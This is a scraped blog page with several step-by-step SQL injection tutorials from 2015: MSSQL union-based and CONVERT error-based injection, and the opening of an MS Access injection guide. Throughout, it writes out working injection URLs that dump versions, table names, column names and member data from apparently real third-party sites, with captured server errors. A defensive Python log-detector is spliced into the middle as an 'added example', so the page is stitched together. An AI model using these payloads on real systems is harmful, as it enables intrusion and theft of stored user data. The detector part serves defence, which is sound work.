<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RLMCr5CD4RdNZb4rdkfR4lc2RtvZXzB_d6SWEsZtWp31NV4fyY5qvJ3uHzun3FALMbbYf0YL-6D83HljqA7EZ-isjjVYfmFboW2WGuf3rxn9gaoe0qfcKs5Kd0-hKbqr5hosQff6qXEc/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg6RLMCr5CD4RdNZb4rdkfR4lc2RtvZXzB_d6SWEsZtWp31NV4fyY5qvJ3uHzun3FALMbbYf0YL-6D83HljqA7EZ-isjjVYfmFboW2WGuf3rxn9gaoe0qfcKs5Kd0-hKbqr5hosQff6qXEc/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+5.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Version:</b><b><span style="font-family: Arial;"><span style="color: red;">Microsoft
SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )</span></span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">Microsoft
SQL Server 2012 (SP1) - 11.0.3000.0 (X64)
Oct 19 2012 13:38:57
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.2 <X64> (Build 9200: )</span>
' to data type smallint.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/products.asp</span><span style="font-family: Arial;">, line 131</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Now Let's Check the Tables from the current Database.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="font-family: Arial;">http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables--+</span></b></span><br />
<span style="font-family: Arial; font-size: small;">Here we got a table name, again inside the conversion error:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzqeSWwAgZkR8pVxL067mRS7uI4Thwtfeb7_PQ7563hNaPDjnBJEwom06Wptws18rDChk8btZI2JdIHt_WKAikymnR8IzVg8ntFVIsFuDWLd0UgsbprakNlQc1bbEQwzpI1KOPerXW2yP/s1600/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Union Based Injection Part-2 - Advanced Method" border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjUzqeSWwAgZkR8pVxL067mRS7uI4Thwtfeb7_PQ7563hNaPDjnBJEwom06Wptws18rDChk8btZI2JdIHt_WKAikymnR8IzVg8ntFVIsFuDWLd0UgsbprakNlQc1bbEQwzpI1KOPerXW2yP/s400/MSSQL+Union+Based+Injection+Part-2+-Advanced+Method+6.png" title="MSSQL Union Based Injection Part-2 - Advanced Method" width="400" /></a></span></div>
<span style="font-size: small;">That is the first table name; to get the next ones we add this clause to the query, listing every table found so far:</span><br />
<span style="color: red; font-size: small;">where table_name not in ('<span style="color: #4c1130;">PREVIOUS_TABLE_1</span>','<span style="color: #4c1130;">PREVIOUS_TABLE_2</span>')</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select table_name,null,null,null,null,null from information_Schema.tables where table_name not in ('products')--+</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">After getting the tables we list the columns of a table with this query:</span><br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='<span style="color: red;">OUR_TABLE_NAME_HERE</span>'--+</b></span><br />
<span style="font-size: small;">That gives us the first column. To get the others we add the exclusion to the WHERE clause with AND (a second WHERE would be a syntax error):</span><br />
<br />
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select column_name,null,null,null,null,null from information_Schema.columns where table_name='<span style="color: red;">OUR_TABLE_NAME_HERE</span>' and column_name not in ('<span style="color: red;">PREVIOUS_COLUMN_1</span>','<span style="color: red;">PREVIOUS_COLUMN_2</span>')--+</b></span><br />
<span style="font-size: small;"><b><br /></b>After getting the table and its columns, the final step is extracting the data from the columns.</span><br />
<span style="font-size: small;">This is the final query:</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.genuinecomputers.in/products.asp?pro=PenDrive') union select <span style="color: red;">OUR_COLUMN_HERE</span>,null,null,null,null,null from <span style="color: red;">OUR_TABLE_HERE</span>--+</b></span><br />
<span style="font-size: small;"><b><br /><span style="color: #cc0000;">Hap</span><span style="color: #a2c4c9;">py</span> <span style="color: #45818e;">Inj</span><span style="color: #741b47;">ect</span><span style="color: #8e7cc3;">ing</span><span style="color: #0c343d;"> !!</span></b></span><br />
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee </b></span>Anonymoushttp://www.blogger.com/profile/02693784085431897325noreply@blogger.com3tag:blogger.com,1999:blog-5545325473666478334.post-15957985315796082892015-07-21T08:17:00.001-07:002015-08-17T09:07:10.573-07:00MSSQL Injection Using Convert<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWkSwZnt0fZYwU62YAHSLTmkRZZd_jP-qA7AT5SEKS319azb_G_lNIcBfMmQMrdF6uuf4pLSpGNmOJzAUWNKIXqSKKvG90xcruiLSgz8Z_WqchDDNu5ySGRlDG2C3pZF4xft9KVihzy84I/s1600/MSSQL+Injection+Using+Convert+Tutorial+www.raijee1337.blogspot.com+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgWkSwZnt0fZYwU62YAHSLTmkRZZd_jP-qA7AT5SEKS319azb_G_lNIcBfMmQMrdF6uuf4pLSpGNmOJzAUWNKIXqSKKvG90xcruiLSgz8Z_WqchDDNu5ySGRlDG2C3pZF4xft9KVihzy84I/s320/MSSQL+Injection+Using+Convert+Tutorial+www.raijee1337.blogspot.com+1.png" title="MSSQL Injection Using Convert" width="269" /></a></span></div>
<span style="font-size: small;">In our previous tutorial we discussed <a href="http://raijee1337.blogspot.com/2015/07/mssql-union-based-injection-step-by.html" target="_blank">MSSQL Union Based Injection</a>.</span><br />
<span style="font-size: small;">Now let's come to the next part. In this tutorial you will learn how to inject a site with a CONVERT attack.</span><br />
<span style="font-size: small;">How this command works: CONVERT(int, expression) asks SQL Server to cast the expression to an integer. When the expression is a string such as @@version, the cast fails and the error message echoes the string we asked for, so whatever we pass to CONVERT comes back to us inside the error. The data is read out of the error rather than out of the page, which is why no UNION and no column count are needed.</span><br />
<a name='more'></a><span style="font-size: small;"><br /></span>
<span style="font-size: small;">So let's start injecting manually.</span><br />
<span style="font-size: small;">We have a target, so let's check whether it is vulnerable by adding a single quote " ' " at the end of the parameter:</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46'</b></span><br />
<span style="font-size: small;">It gives us an error:</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WZq8DBTnSMwRufFd0fAaXkhyphenhyphenJgwVOABxb9zYJGjjvQVWX_fDUMbjrOHLNsTRMAMxf4_iwKDjQ6pqvS2nw2J0MV8IIZ0l_dCXXORvd8gw0Wb9yNwBddQ-SH6dnPpBQcmAR_dwfzLfV8xg/s1600/MSSQL+Injection+Using+Convert+Tutorial+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="127" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-WZq8DBTnSMwRufFd0fAaXkhyphenhyphenJgwVOABxb9zYJGjjvQVWX_fDUMbjrOHLNsTRMAMxf4_iwKDjQ6pqvS2nw2J0MV8IIZ0l_dCXXORvd8gw0Wb9yNwBddQ-SH6dnPpBQcmAR_dwfzLfV8xg/s400/MSSQL+Injection+Using+Convert+Tutorial+1.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>ERROR:</b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string ''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Our target site is vulnerable. Since we are injecting with the Convert attack we do not need to count the total number of columns; we execute our commands with CONVERT directly.</span><br />
<span style="font-family: Arial; font-size: small;">Let's check the version.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--</b></span> <br />
<span style="font-size: small;">After executing the query we got the version.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v4-ENYj-dSIcGeuZ8DE2XjpRA1rusMrwP9JEa9aspu1X0G5uaxla9iztBhVdODDG6IU-ZReJejuoup1rkPto4P-qiBOn8-siCJX3oFG1IReZuDcHHrAupM2dZGjNDa3tLosUwPwzqZ_w/s1600/MSSQL+Injection+Using+Convert+Tutorial+2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="152" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi9v4-ENYj-dSIcGeuZ8DE2XjpRA1rusMrwP9JEa9aspu1X0G5uaxla9iztBhVdODDG6IU-ZReJejuoup1rkPto4P-qiBOn8-siCJX3oFG1IReZuDcHHrAupM2dZGjNDa3tLosUwPwzqZ_w/s400/MSSQL+Injection+Using+Convert+Tutorial+2.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Here is the version:</b><span style="font-family: Arial;"><span style="color: red;">Microsoft
SQL Server 2012 - 11.0.5582.0 (X64)
Feb 27 2015 18:10:15
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 &lt;X64&gt; (Build 7601: Service
Pack 1)</span></span></span><br />
<span style="font-family: Arial; font-size: small;">Microsoft OLE DB Provider for ODBC Drivers</span><span style="font-size: small;"> <span style="font-family: Arial;">error '80040e07'</span></span>
<br />
<span style="font-family: Arial; font-size: small;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">Microsoft
SQL Server 2012 - 11.0.5582.0 (X64)
Feb 27 2015 18:10:15
Copyright (c) Microsoft Corporation
Web Edition (64-bit) on Windows NT 6.1 &lt;X64&gt; (Build 7601: Service
Pack 1)</span>
' to data type int.</span>
<br />
<span style="font-family: Arial; font-size: small;">/authorprofile.asp</span><span style="font-family: Arial; font-size: small;">, line 10</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Now let's check the current database name.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())--</b></span><br />
<span style="font-size: small;">And we have got the current database name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx67JDVYd99fJpUXbDxF3cSNrUkVehO9UZtoJj4WtBJ1r-eLTJ9b9B1lqIETLaUl5ucWWWX870Jgf6tGz00HESCGp9Z7RcvlFqAFImyyz4FSRb1dPtveFbc08RDuHrJIwY4PYED1g2SVgi/s1600/MSSQL+Injection+Using+Convert+Tutorial+3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="142" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx67JDVYd99fJpUXbDxF3cSNrUkVehO9UZtoJj4WtBJ1r-eLTJ9b9B1lqIETLaUl5ucWWWX870Jgf6tGz00HESCGp9Z7RcvlFqAFImyyz4FSRb1dPtveFbc08RDuHrJIwY4PYED1g2SVgi/s400/MSSQL+Injection+Using+Convert+Tutorial+3.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /></b></span>
<span style="font-size: small;"><b>This is the current database name:</b><b><span style="font-family: Arial;"><span style="color: red;">museindia</span></span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL
Server]Conversion failed when converting the nvarchar value '<span style="color: red;">museindia</span>'
to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">As we have got the version and the database name, let's move on to getting the tables.</span><br />
<span style="font-size: small;">This is our query for getting the tables.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables))--+</b></span><br />
<span style="font-size: small;">After executing the query we have got the first table name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOj-DoIovUdwuL_UGhCvzKRIv5351vuDCtGkfYTQuBNwXWhPpdL2ai5xdmOx_DHIW90UKS_Ebop5G2AkGmMBzzZ_mNla-q3fXQlEeT_4juKe4UAmPmkB8ThR_wx9QOqWN5f_AKzkrYtVed/s1600/MSSQL+Injection+Using+Convert+Tutorial+4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="135" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOj-DoIovUdwuL_UGhCvzKRIv5351vuDCtGkfYTQuBNwXWhPpdL2ai5xdmOx_DHIW90UKS_Ebop5G2AkGmMBzzZ_mNla-q3fXQlEeT_4juKe4UAmPmkB8ThR_wx9QOqWN5f_AKzkrYtVed/s400/MSSQL+Injection+Using+Convert+Tutorial+4.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>Table name:<span style="color: red;">about</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '<span style="color: red;">about</span>' to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-family: Arial; font-size: small;">To get the other tables from the database we add the table names we already know, each enclosed in single quotes, inside a NOT IN ( ... ) clause.</span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">For Example:</span></b></span><br />
<span style="font-size: small;"><b>and 1=convert(int,(select top 1 table_name from information_schema.tables <span style="color: red;">where table_name not in ('<span style="color: orange;">OUR_PREVIOUS_TABLE_NAME_1</span>','<span style="color: orange;">OUR_PREVIOUS_TABLE_NAME_2</span>')</span>))--+</b></span><br />
<span style="font-size: small;">So let's check the other tables from the database.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('about')))--+</b></span><br />
<span style="font-size: small;">And we have got the next table name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1nr7W_fYzhXmpW_uO05xdYEizO50dBTMaz153vUGR4Mpgnndeop4yPKG-YCZCcTRmpZ_RLhoTPYtzJyak7ZU58Lir54J2Mhktb0QZDeArvHt903Qc5LZF9JVm63eiTFxZfsCtQSNK7DC/s1600/MSSQL+Injection+Using+Convert+Tutorial+5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="103" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhg1nr7W_fYzhXmpW_uO05xdYEizO50dBTMaz153vUGR4Mpgnndeop4yPKG-YCZCcTRmpZ_RLhoTPYtzJyak7ZU58Lir54J2Mhktb0QZDeArvHt903Qc5LZF9JVm63eiTFxZfsCtQSNK7DC/s400/MSSQL+Injection+Using+Convert+Tutorial+5.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b><br /><br />Next Table Name:<span style="color: red;">aucon</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft OLE DB Provider for ODBC Drivers</span> <span style="font-family: Arial;">error '80040e07'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting the nvarchar value '<span style="color: red;">aucon</span>' to data type int.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/authorprofile.asp</span><span style="font-family: Arial;">, line 10</span></b></span><br />
<span style="font-size: small;"><b><span style="font-family: Arial;">In this way we continue getting the other tables until we reach the required table.</span></b></span><br />
<span style="font-family: Arial; font-size: small;"><b>Here we got the table name:</b></span><span style="font-size: small;"> <span style="color: red;">members</span></span><br />
<span style="font-size: small;">Now let's get the column names from this table.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members'))--+</b></span><br />
<span style="font-size: small;">We have got the first column name.</span><br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5-QKu-GOd2YgykaEisQng_LHMT_cSYG_OcnMcMOTe8mplBSV3n75kG8uUGhyp6oXSJl-yA_0NmfHyqB0YPLlnYtPJz9eAkArW1EwaXZRBBQWH6xOT2beDBZCm_2eBvlufkS-UHBreNyo/s1600/MSSQL+Injection+Using+Convert+Tutorial+6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MSSQL Injection Using Convert" border="0" height="121" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5-QKu-GOd2YgykaEisQng_LHMT_cSYG_OcnMcMOTe8mplBSV3n75kG8uUGhyp6oXSJl-yA_0NmfHyqB0YPLlnYtPJz9eAkArW1EwaXZRBBQWH6xOT2beDBZCm_2eBvlufkS-UHBreNyo/s400/MSSQL+Injection+Using+Convert+Tutorial+6.png" title="MSSQL Injection Using Convert" width="400" /></a></span></div>
<span style="font-size: small;"><b> </b></span><br />
<span style="font-size: small;"><b>This is the first column name:<span style="color: red;">memberid</span></b></span><br />
<span style="font-size: small;"><b>Let's get the other columns the same way we got the other tables from the database.</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='members' and column_name not in ('memberid')))--+</b></span><br />
<span style="font-size: small;">After getting the column names, the final part is extracting data from the columns.</span><br />
<span style="font-size: small;"><b>This will be our final query!</b></span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1 <span style="color: red;">OUR_COLUMN_NAME_HERE</span> from <span style="color: orange;">OUR_TABLE_NAME_HERE</span>))--+</b></span><br />
<span style="font-size: small;">This query prints the data from the column on the web page.</span><br />
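From the defender's side, every request in this post leaves a distinctive trace in the web server log. As an added example that is not part of the original post, here is a Python detector that scans constructed IIS W3C log lines for the request patterns used above (the appended quote, convert(int, ...) against @@version and db_name(), and the information_schema walk with NOT IN) and correlates them with the 5xx responses the technique depends on; the log lines, client addresses and thresholds are constructed for the example.

```python
"""Flag error-based (CONVERT) MSSQL injection probes in IIS W3C log lines.

Added example; the log lines, client addresses and thresholds are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qsl

# Constructed sample log in IIS W3C format: the request sequence follows the
# probes in the post (appended quote, convert() on @@version and db_name(),
# then the information_schema walk), plus benign requests from another client.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2015-07-21 10:00:01 203.0.113.5 GET /authorprofile.asp id=46 200
2015-07-21 10:00:09 203.0.113.5 GET /authorprofile.asp id=46%27 500
2015-07-21 10:00:31 203.0.113.5 GET /authorprofile.asp id=46%20and%201=convert(int,@@version)-- 500
2015-07-21 10:01:02 203.0.113.5 GET /authorprofile.asp id=46%20and%201=convert(int,db_name())-- 500
2015-07-21 10:01:40 203.0.113.5 GET /authorprofile.asp id=46+and+1=convert(int,(select+top+1+table_name+from+information_schema.tables+where+table_name+not+in+(%27about%27)))--+ 500
2015-07-21 10:02:15 198.51.100.7 GET /authorprofile.asp id=47 200
2015-07-21 10:02:30 198.51.100.7 GET /search.asp q=convert+my+file 200
"""

# Each rule is matched against the URL-decoded value of every query parameter.
RULES = [
    ("quote_probe", re.compile(r"^\d+\s*'\s*$")),                     # 46'
    ("convert_cast", re.compile(r"\bconvert\s*\(\s*int\s*,", re.I)),   # convert(int, ...)
    ("fingerprint", re.compile(r"@@version|\bdb_name\s*\(", re.I)),    # version / current db
    ("schema_enum", re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("not_in_walk", re.compile(r"\bnot\s+in\s*\(", re.I)),             # walking rows one by one
    ("comment_tail", re.compile(r"--\+?\s*$")),                        # trailing SQL comment
]


def parse_line(line):
    """Parse one W3C log line into a dict; directives, blanks and malformed lines give None."""
    if not line.strip() or line.startswith("#"):
        return None
    parts = line.split()
    if len(parts) != 7:
        return None
    _date, _time, ip, _method, stem, query, status = parts
    return {"ip": ip, "stem": stem, "query": query, "status": int(status)}


def classify_query(raw_query):
    """Return the sorted list of rule names matched by any parameter value."""
    hits = set()
    for _name, value in parse_qsl(raw_query, keep_blank_values=True):
        for rule_name, pattern in RULES:
            if pattern.search(value):
                hits.add(rule_name)
    return sorted(hits)


def analyze(log_text, min_probes=2):
    """Aggregate evidence per client; a client is reported when it sent at least
    min_probes suspicious requests, or any convert(int, ...) request at all."""
    evidence = defaultdict(lambda: {"probes": 0, "server_errors": 0, "rules": set(), "paths": set()})
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        rules = classify_query(rec["query"])
        if not rules:
            continue
        entry = evidence[rec["ip"]]
        entry["probes"] += 1
        entry["rules"].update(rules)
        entry["paths"].add(rec["stem"])
        if rec["status"] // 100 == 5:      # error-based extraction depends on 5xx pages
            entry["server_errors"] += 1
    return {ip: e for ip, e in evidence.items()
            if e["probes"] >= min_probes or "convert_cast" in e["rules"]}


if __name__ == "__main__":
    for ip, e in analyze(SAMPLE_LOG).items():
        print(ip, e["probes"], "probes,", e["server_errors"], "server errors:",
              ", ".join(sorted(e["rules"])))
```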
<span style="color: purple; font-size: small;">HAP</span><span style="color: #990000; font-size: small;">PY</span><span style="font-size: small;"> <span style="color: #bf9000;">INJE</span><span style="color: #4c1130;">CTING</span> <span style="color: #76a5af;">!! </span></span><br />
<span style="font-size: small;"><b>AUTHOR:Rai Muzammal Hussain a.k.a RAi Jee</b></span><br />
<span style="font-size: small;"><br /></span>
MS-Access Injection -Tutorial (published 2015-07-20)<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFSobJ_pRfealwLO5h4oCccGwziDO9_ETzIb90EcR6R-bna5nqpYIRIuNAfphabqITWDsppHSreN8GnMzfKlFbVt5KnRj2KS1tnuMCxkeXRj4gMcAgiE-wWhl2Ru_Sip0t_HwWzvqxZZiP/s1600/MS-Acces+Injection+-+www.raijee1337.blogspot.com+Tutorials.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="174" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjFSobJ_pRfealwLO5h4oCccGwziDO9_ETzIb90EcR6R-bna5nqpYIRIuNAfphabqITWDsppHSreN8GnMzfKlFbVt5KnRj2KS1tnuMCxkeXRj4gMcAgiE-wWhl2Ru_Sip0t_HwWzvqxZZiP/s320/MS-Acces+Injection+-+www.raijee1337.blogspot.com+Tutorials.png" title="MS-Access Injection -Tutorial" width="320" /></a></div>
In this tutorial you will learn how to inject into an MS Access database.<br />
So we start our injection manually. First we have to check whether our target site is vulnerable, so we use the regular injection test and add a single quote ' at the end of the parameter<br />
<a name='more'></a><br />
and execute the URL:<br />
<br />
<b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'</b><br />
Here we got the error!<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrPoiPMDA5E2bJ1sn0XhCyKJuOP3QbDmWv6KS8mlHmaew2ENRnRIXIxeBlSm4fccijpOpIqE8HJooZDZDA1N5rYtBUfauqjM4Lk823sG8uSeuILRuzp3MDI98UHsGXK1JxUqfAYUl-dfHH/s1600/MS-Acces+Injection+-Tutorial+1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img alt="MS-Access Injection -Tutorial" border="0" height="205" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjrPoiPMDA5E2bJ1sn0XhCyKJuOP3QbDmWv6KS8mlHmaew2ENRnRIXIxeBlSm4fccijpOpIqE8HJooZDZDA1N5rYtBUfauqjM4Lk823sG8uSeuILRuzp3MDI98UHsGXK1JxUqfAYUl-dfHH/s400/MS-Acces+Injection+-Tutorial+1.png" title="MS-Access Injection -Tutorial" width="400" /></a></div>
ERROR:<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Microsoft JET Database Engine</span> <span style="font-family: Arial;">error '80040e14'</span></b></span>
<br />
<span style="font-size: small;"><b><span style="font-family: Arial;">Syntax error in string in query expression 'ID =341''.</span></b></span>
<br />
<span style="font-size: small;"><b>
<span style="font-family: Arial;">/dettaglio-news.asp</span><span style="font-family: Arial;">, line 91</span></b></span><br />
<span style="font-family: Arial; font-size: small;">So our target is vulnerable. Before anything else we have to balance our query, so we try different comment sequences to close it.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b><span style="font-family: Arial;">ERROR:</span><span style="font-family: Arial;">Syntax error (missing operator) in query expression 'ID =341--'.</span></b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!</b></span><br />
<br />
<span style="font-size: small;">Now let's try the null byte <b>;%00</b>.</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;%00</b> <b>Error gone!!</b></span><br />
<span style="font-size: small;">So we continue our injection with the null byte at the end of the parameter.</span><br />
<span style="font-size: small;"><br /></span>
<span style="font-family: Arial; font-size: small;">Now we have to count the total number of columns. For this we use the usual ORDER BY method.</span><br />
<span style="font-family: Arial; font-size: small;">Let's check the total number of columns:</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;%00</b></span><br />
<span style="font-size: small;"><b>No Error. Page Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;%00</b></span><br />
<span style="font-size: small;"><b>Again No Error !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;%00</b></span><br />
<span style="font-size: small;"><b>Again page Loaded Normally !</b></span><br />
<span style="font-size: small;"><br /></span>
<span style="font-size: small;">But at ORDER BY 9 we got an error!</span><br />
<span style="font-size: small;"><b>http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;%00</b></span><br />
<div class="separator" style="clear: both; text-align: center;">
